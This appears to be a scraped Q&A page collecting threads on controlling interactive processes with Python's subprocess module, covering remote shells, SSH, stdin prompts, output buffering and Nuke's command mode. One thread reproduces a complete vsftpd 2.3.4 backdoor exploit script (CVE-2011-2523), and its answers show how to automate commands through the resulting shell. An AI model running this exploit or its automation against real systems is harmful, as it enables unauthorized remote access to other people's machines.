I have a custom input method and a Python module to communicate with it. I'm trying to control the shell with it, so that everything written to local stdout is printed on the remote device, and everything sent from the remote device goes into local stdin. That way the remote device controls the input given to the program: if the program calls an input function, the remote device can answer it too (like in ssh).
I used the Python subprocess module to control stdin and stdout:
#! /usr/bin/python
from subprocess import Popen, PIPE
import thread
from mymodule import remote_read, remote_write

def talk2proc(dap):
    while True:
        try:
            remote_write(dap.stdout.read())
            incmd = remote_read()
            dap.stdin.write(incmd)
        except Exception as e:
            print(e)
            break

while True:
    cmd = remote_read()
    if cmd != 'quit':
        p = Popen(['bash', '-c', '"%s"'%cmd], stdout=PIPE, stdin=PIPE, stderr=PIPE)
        thread.start_new_thread(talk2proc, (p,))
        p.wait()
    else:
        break
But it doesn't work. What should I do?
P.S. Is there a difference for Windows?
I had this problem; I used this for stdin:
from subprocess import call
call(['some_app', 'param'], stdin=open("a.txt", "rb"))
a.txt
:q
I used this for a git wrapper; it feeds the data line by line whenever some_app pauses and expects user input.
There is a difference for Windows. This line won't work in Windows:
p = Popen(['bash', '-c', '"%s"'%cmd], stdout=PIPE, stdin=PIPE, stderr=PIPE)
because the equivalent of 'bash' is 'cmd.exe'.
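For example, a rough Windows equivalent (an untested sketch) would launch the command through cmd.exe instead:

p = Popen(['cmd.exe', '/c', cmd], stdout=PIPE, stdin=PIPE, stderr=PIPE)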
Related
I would like to "automate" a reverse shell given by a script. Let me explain:
Context: there is a backdoor on a vulnerable machine.
What I am doing: I create a subprocess which executes a script (Python, Perl, ...) and gives me a reverse shell.
Popen(["python", "/opt/exploits/backdoor.py", remote_ip], stderr=PIPE).communicate()
What I would like to do: along with running my script (i.e. running my reverse shell), I would like to be able to interact with it using methods.
Today, I can type manually in the terminal of my reverse shell: the script that I call with Popen runs and uses the backdoor. This gives me a reverse shell and I can type my commands.
Tomorrow, I would like to call methods during the execution of this reverse shell: I run a script with Popen, it exploits the backdoor and gives me a shell. Rather than typing commands manually, I want a whole series of commands to be sent to this reverse shell automatically, and for each of them I want to recover the returned data.
Ideally, I would like something like this:
backdoor.execute() //This method allows me to get a reverse shell
backdoor.send("whoami") //This method allows me to send a command to the reverse shell and get the result
.
.
backdoor.finish() //This method allows me to close the reverse shell
What I tried without success: I tried, with the Popen class of the subprocess module, to redirect the input and/or the output of the script:
Popen(["python", "/opt/exploits/backdoor.py", remote_ip], stdin=PIPE, stdout=PIPE, stderr=PIPE).communicate()
However, when trying to redirect these two streams (or just one of them), my reverse shell closes as quickly as it opened.
I also tried to put my commands directly in the communicate() method:
Popen(["python", "/opt/exploits/backdoor.py", remote_ip], stdin=PIPE, stdout=PIPE, stderr=PIPE).communicate(b"whoami")
I tried this with and without redirection of the input and/or output, but nothing worked.
Finally, I tried to use the pexpect module to run my script and get a reverse shell, but I didn't get anything conclusive (maybe I did it wrong).
PS: I cannot change the code of the script that allows me to use the backdoor.
backdoor.py
# Exploit Title: vsftpd 2.3.4 - Backdoor Command Execution
# Date: 9-04-2021
# Exploit Author: HerculesRD
# Software Link: http://www.linuxfromscratch.org/~thomasp/blfs-book-xsl/server/vsftpd.html
# Version: vsftpd 2.3.4
# Tested on: debian
# CVE : CVE-2011-2523
#!/usr/bin/python3
from telnetlib import Telnet
import argparse
from signal import signal, SIGINT
from sys import exit
def handler(signal_received, frame):
    # Handle any cleanup here
    print(' [+]Exiting...')
    exit(0)
signal(SIGINT, handler)
parser=argparse.ArgumentParser()
parser.add_argument("host", help="input the address of the vulnerable host", type=str)
args = parser.parse_args()
host = args.host
portFTP = 21 #if necessary edit this line
user="USER nergal:)"
password="PASS pass"
tn=Telnet(host, portFTP)
tn.read_until(b"(vsFTPd 2.3.4)") #if necessary, edit this line
tn.write(user.encode('ascii') + b"\n")
tn.read_until(b"password.") #if necessary, edit this line
tn.write(password.encode('ascii') + b"\n")
tn2=Telnet(host, 6200)
print('Success, shell opened')
print('Send `exit` to quit shell')
tn2.interact()
Popen(["python", "/opt/exploits/backdoor.py", remote_ip], stdin=PIPE, stdout=PIPE, stderr=PIPE).communicate(b"whoami")
This should work for a single command if a \n is appended and the -u (unbuffered) option is used. Of course, something has to be done with the return value in order to get the command output:
output = Popen(["python", "-u", "/opt/exploits/backdoor.py", remote_ip],
stdin=PIPE, stdout=PIPE, stderr=PIPE).communicate(b"whoami\n")
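communicate() returns a (stdout, stderr) tuple, so the command output could then be printed with something like:

print(output[0].decode())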
backdoor.send("whoami") //This method allow me to send a command to the reverse shell and to get the result
Provided that
backdoor = Popen(["python", "-u", "backdoor.py", remote_ip], stdin=PIPE, stdout=PIPE, stderr=PIPE)
we can send a command (if you don't want to exit right after it) with e.g.
backdoor.stdin.write(b"whoami\n")
and get the result of undetermined length with:
import select
import os
timeout = 1
while select.select([backdoor.stdout], [], [], timeout)[0]:
    print(os.read(backdoor.stdout.fileno(), 4096).decode())
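Putting the same Popen + select approach together, a rough sketch of the execute/send/finish wrapper asked for above might look like this. The Backdoor class and its details are my own illustration (untested against a real target); the 'exit' command comes from backdoor.py's own prompt:

import os
import select
from subprocess import Popen, PIPE

class Backdoor:
    def __init__(self, remote_ip, script="/opt/exploits/backdoor.py", timeout=1):
        self.remote_ip = remote_ip
        self.script = script
        self.timeout = timeout
        self.proc = None

    def execute(self):
        # -u keeps the child unbuffered so replies arrive promptly
        self.proc = Popen(["python", "-u", self.script, self.remote_ip],
                          stdin=PIPE, stdout=PIPE, stderr=PIPE)

    def send(self, command):
        self.proc.stdin.write(command.encode() + b"\n")
        self.proc.stdin.flush()
        chunks = []
        # read until the output stays silent for `timeout` seconds
        while select.select([self.proc.stdout], [], [], self.timeout)[0]:
            data = os.read(self.proc.stdout.fileno(), 4096)
            if not data:  # EOF: the shell has closed
                break
            chunks.append(data)
        return b"".join(chunks).decode()

    def finish(self):
        self.proc.stdin.write(b"exit\n")  # backdoor.py quits the shell on `exit`
        self.proc.stdin.flush()
        self.proc.wait()

Usage would then mirror the pseudocode in the question: backdoor = Backdoor(remote_ip); backdoor.execute(); print(backdoor.send("whoami")); backdoor.finish().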
I would like to open an SSH session, run commands, and get the output in real time as the process runs (later this will involve running additional commands on the remote server).
from subprocess import Popen, PIPE
with Popen(['ssh <server-domain-name>'],
           shell=True,
           stdin=PIPE, stdout=PIPE, stderr=PIPE,
           universal_newlines=True) as ssh:
    output1 = ssh.stdin.write('ls -l')
    output2 = ssh.stdin.write('mkdir test')
    status = ssh.poll()
    print(output1)
    print(output2)
So far this is what I have. Using ssh.communicate(<command>) gives the right output but closes the subprocess after the first command. Any thoughts?
This worked for me:
from fabric2 import Connection

with Connection('<host>') as c:
    # CGREEN and CEND are assumed ANSI colour constants defined elsewhere
    print(CGREEN + 'connected successfully!' + CEND)
    # gather user info
    user = c.run("whoami", hide=True)
    print(f'user found: {user.stdout}')
    # fetching files
    c.run(<command>, pty=True)
The scenario is: I have a Python script, part of which executes an external program using the code below:
subprocess.run(["someExternalProgram", "some options"], shell=True)
And when the external program finishes, it requires user to "press any key to exit".
Since this is just a step in my script, it would be good for me to just exit on behalf of the user.
Is it possible to achieve this and if so, how?
from subprocess import Popen, PIPE
p = Popen(["someExternalProgram", "some options"], stdin=PIPE, shell=True)
p.communicate(input=b'\n')
If you want to capture the output and error log
from subprocess import Popen, PIPE
p = Popen(["someExternalProgram", "some options"], stdin=PIPE, stdout=PIPE, stderr=PIPE, shell=True)
output, error = p.communicate(input=b'\n')
Remember that the input has to be a bytes object.
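If you'd rather work with plain strings, a variant of the same call (a sketch assuming Python 3.7+ for the text parameter, with the same placeholder program name) would be:

from subprocess import Popen, PIPE

p = Popen(["someExternalProgram", "some options"], stdin=PIPE, stdout=PIPE, stderr=PIPE, shell=True, text=True)
output, error = p.communicate(input='\n')  # text mode: pass a str instead of bytes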
I have a Python (v3.3) script that runs other shell scripts. My Python script also prints messages like "About to run script X" and "Done running script X".
When I run my script I'm getting all the output of the shell scripts separate from my print statements. I see something like this:
All of script X's output
All of script Y's output
All of script Z's output
About to run script X
Done running script X
About to run script Y
Done running script Y
About to run script Z
Done running script Z
My code that runs the shell scripts looks like this:
print( "running command: " + cmnd )
ret_code = subprocess.call( cmnd, shell=True )
print( "done running command")
I wrote a basic test script and do *not* see this behaviour. This code does what I would expect:
print("calling")
ret_code = subprocess.call("/bin/ls -la", shell=True )
print("back")
Any idea on why the output is not interleaved?
Thanks. This works but has one limitation: you can't see any output until after the command completes. I found an answer to another question (here) that uses Popen but also lets me see the output in real time. Here's what I ended up with:
import subprocess
import sys

cmd = ['/media/sf_git/test-automation/src/SalesVision/mswm/shell_test.sh', '4', '2']

print('running command: "{0}"'.format(cmd))  # output the command.

# Here, we join the STDERR of the application with the STDOUT of the application.
process = subprocess.Popen(cmd, bufsize=1, universal_newlines=True,
                           stdout=subprocess.PIPE, stderr=subprocess.STDOUT)

for line in iter(process.stdout.readline, ''):
    line = line.replace('\n', '')
    print(line)
    sys.stdout.flush()

process.wait()                # Wait for the underlying process to complete.
errcode = process.returncode  # Harvest its returncode, if needed.
print('Script ended with return code of: ' + str(errcode))
This uses Popen and allows me to see the progress of the called script.
It has to do with STDOUT and STDERR buffering. You should be using subprocess.Popen to redirect STDOUT and STDERR from your child process into your application. Then, as needed, output them. Example:
import subprocess

cmd = ['ls', '-la']
print('running command: "{0}"'.format(cmd))  # output the command.

# Here, we join the STDERR of the application with the STDOUT of the application.
process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out, err = process.communicate()  # Wait for completion; capture STDOUT and STDERR
errcode = process.returncode      # Harvest its returncode, if needed.
print(out.decode())
print('done running command')
Additionally, I wouldn't use shell=True unless it's really required. It forces subprocess to fire up a whole shell environment just to run a command. It's usually better to pass the command as a list and, if you need extra environment variables, supply them through the env parameter of Popen.
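For instance, a sketch of the same ls call without shell=True, where the extra MY_VAR variable is only a made-up illustration of passing environment values through env:

import os
import subprocess

env = dict(os.environ, MY_VAR='1')  # hypothetical extra environment variable
process = subprocess.Popen(['ls', '-la'],
                           stdout=subprocess.PIPE, stderr=subprocess.STDOUT,
                           env=env)
out, err = process.communicate()
print(out.decode())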
I am running a subprocess that runs a piece of software in "command" mode. (The software is Nuke by The Foundry, in case you know it.)
When in command mode, this software waits for user input. This mode allows creating compositing scripts without any UI.
I have written this bit of code that starts the process and detects when the application has finished starting; then I try to send the process some commands, but stdin doesn't seem to deliver them properly.
Here is the sample code I wrote to test this process.
import subprocess

appPath = '/Applications/Nuke6.3v3/Nuke6.3v3.app/Nuke6.3v3'
readyForCommand = False

commandAndArgs = [appPath, '-V', '-t']
commandAndArgs = ' '.join(commandAndArgs)
process = subprocess.Popen(commandAndArgs,
                           stdin=subprocess.PIPE,
                           stdout=subprocess.PIPE,
                           stderr=subprocess.STDOUT,
                           shell=True)

while True:
    if readyForCommand:
        print 'trying to send command to nuke...'
        process.stdin.write('import nuke')
        process.stdin.write('print nuke')
        process.stdin.write('quit()')
        print 'done sending commands'
        readyForCommand = False
    else:
        print 'Reading stdout ...'
        outLine = process.stdout.readline().rstrip()
        if outLine:
            print 'stdout:', outLine
            if outLine.endswith('getenv.tcl'):
                print 'setting ready for command'
                readyForCommand = True
        if outLine == '' and process.poll() != None:
            print 'in break!'
            break

print('return code: %d' % process.returncode)
When I run Nuke in a shell and send the same commands, here is what I get:
sylvain.berger core/$ nuke -V -t
[...]
Loading /Applications/Nuke6.3v3/Nuke6.3v3.app/Contents/MacOS/plugins/getenv.tcl
>>> import nuke
>>> print nuke
<module 'nuke' from '/Applications/Nuke6.3v3/Nuke6.3v3.app/Contents/MacOS/plugins/nuke/__init__.pyc'>
>>> quit()
sylvain.berger core/$
Any idea why the stdin is not sending the commands properly?
Thanks
Your code will send the text
import nukeprint nukequit()
with no newlines, so the Python instance will not try to execute anything; everything just sits in a buffer waiting for a newline.
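For example, the writes in the question's loop would become something like this (a sketch, not tested against Nuke):

process.stdin.write('import nuke\n')
process.stdin.write('print nuke\n')
process.stdin.write('quit()\n')
process.stdin.flush()  # make sure the buffered lines actually reach the child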
The subprocess module is not intended for interactive communication with a process. At best, you can give it a single pre-computed standard input string and then read its stdout and stderr:
p = Popen(..., stdin=PIPE, stdout=PIPE, stderr=PIPE)
out, err = p.communicate(predefined_stdin)
If you actually need interaction, consider using pexpect.
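A minimal pexpect sketch, assuming the same Nuke command line and the '>>>' prompt shown in the interactive session above:

import pexpect

child = pexpect.spawn('/Applications/Nuke6.3v3/Nuke6.3v3.app/Nuke6.3v3 -V -t', encoding='utf-8')
child.expect('>>> ')           # wait for the embedded Python prompt
child.sendline('import nuke')
child.expect('>>> ')
child.sendline('print nuke')
child.expect('>>> ')
print(child.before)            # everything printed since the previous prompt
child.sendline('quit()')
child.expect(pexpect.EOF)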